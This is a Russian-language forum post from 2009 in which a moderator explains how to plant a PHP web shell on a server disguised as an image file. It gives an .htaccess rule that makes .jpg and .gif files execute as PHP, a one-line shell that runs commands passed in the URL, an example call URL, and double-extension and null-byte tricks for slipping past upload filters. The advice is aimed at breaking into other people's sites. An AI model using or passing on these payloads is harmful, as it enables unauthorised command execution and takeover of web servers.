| Ivakhnuk | Дата: Суббота, 25.04.2009, 16:48 | Сообщение # 1 |
Пишу редко, но метко
Группа: Модератор
Сообщений: 102
Награды: 1
Репутация: 2
Статус: Отсутствует
| Можешь попробывать просто php скрипт переименовать в jpg (или другое, что нравится), а в .htaccess указать, чтобы обрабатывало указанное тобой расширение как php скрипт.
[code:1:c611e674ee]
AddType application/x-httpd-php .jpg .gif
[/code:1:c611e674ee]
Но это если есть возможность.
Через картинку...Открываешь её любым hex редактором. Например WinHex и вконец файла добавляешь шелл.
[code:1:c611e674ee]
<?passthru($_GET[cmd]);?>
[/code:1:c611e674ee]
Сохраняешь результат, ставишь нужное расширение и вперёд)
Чтобы вызвать шелл, тебе нужно будет его приинклудить. Для этого, естественно, нужно знать путь. Использование:
http://site.com/dir/dir/shell.php.gif?&cmd=id
Используешь консольные команды той операционной системы, на которую ты залил его. Иногда катит такой метод. Заливаешь картинку как shell.jpg.php и апач обрабатывает предпоследнее расширение файла. Или shell.php%00.jpg. Но всё таки сейчас в большинстве продуктов это исправлено. Если будешь пробовать так, то пробуй лучше с *.gif файлом.
Не всё в етом мире правильно !!
|
| |
| |
